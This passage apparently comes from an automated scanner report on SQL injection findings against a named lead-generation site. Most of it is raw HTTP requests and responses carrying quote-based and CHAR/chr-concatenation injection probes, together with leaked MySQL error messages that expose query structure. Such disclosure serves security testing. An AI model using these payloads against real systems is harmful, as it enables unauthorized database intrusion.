GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=4ltspoajte8hfcholsneqvs3h2; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=5ss9n54jbkkig4kdkljae8lep7; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:27 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=v8o6466fkb7p7q6hmho051aoe3; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:06:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6614 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code' OR prj.project_pa' at line 5
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc'&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:51:55 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=274b0klk7lq8d4e4eog044tpl6; path=/ Content-Length: 7542 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc''&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:51:56 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ke2uk5fckalg3m83qsomct1gl3; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:21 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7366 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... )+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48957
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
1.268. http://www.insideup.com/ppc/leadflow/dima00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/dima00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+/1'code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=eiff3du6sg5opr7t07pg0a5421; path=/ Content-Length: 7558 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... mpaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip /1'code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=cast((select ' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+/1''code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 01:53:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ug2hig894eabbf6mppj9qhd2p2; path=/ Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>
The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7366 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... )+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48957
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006'&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7366 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... )+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006''&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48957
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
